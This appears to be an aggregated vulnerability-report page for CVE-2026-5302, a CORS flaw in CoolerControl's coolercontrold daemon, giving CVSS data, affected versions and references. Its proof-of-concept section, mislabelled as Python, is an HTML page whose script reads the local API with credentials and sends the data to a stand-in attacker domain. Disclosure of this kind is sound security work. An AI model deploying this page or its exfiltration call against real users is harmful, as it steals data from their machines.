Security Vulnerability Report
中文
CVE-2026-5302 CVSS 6.3 MEDIUM

CVE-2026-5302

Published: 2026-04-08 13:16:43
Last Modified: 2026-04-16 00:40:12

Description

CORS misconfiguration in CoolerControl/coolercontrold <4.0.0 allows unauthenticated remote attackers to read data and send commands to the service via malicious websites

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:coolercontrol:coolercontrold:*:*:*:*:*:*:*:* - VULNERABLE
CoolerControl/coolercontrold < 4.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-5302: CORS Misconfiguration This script attempts to read data from the vulnerable CoolerControl API. --> <html> <body> <script> // Target the local CoolerControl API endpoint const targetUrl = 'http://localhost:5000/api/v1/data'; function exploit() { fetch(targetUrl, { method: 'GET', mode: 'cors', credentials: 'include' // Include cookies if available }) .then(response => response.text()) .then(data => { console.log('Exfiltrated Data:', data); // Send data to attacker's server fetch('https://attacker-controlled-domain.com/log?d=' + encodeURIComponent(data)); }) .catch(error => console.error('Exploit failed:', error)); } exploit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5302", "sourceIdentifier": "[email protected]", "published": "2026-04-08T13:16:43.403", "lastModified": "2026-04-16T00:40:11.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CORS misconfiguration in CoolerControl/coolercontrold <4.0.0 allows unauthenticated remote attackers to read data and send commands to the service via malicious websites"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-942"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coolercontrol:coolercontrold:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.0.0", "matchCriteriaId": "058074F8-B65C-4417-A5A1-9746DF8E3B12"}]}]}], "references": [{"url": "https://gitlab.com/coolercontrol/coolercontrol/-/blob/2.0.0/coolercontrold/src/api/mod.rs?ref_type=tags#L374", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://gitlab.com/coolercontrol/coolercontrol/-/releases/4.0.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}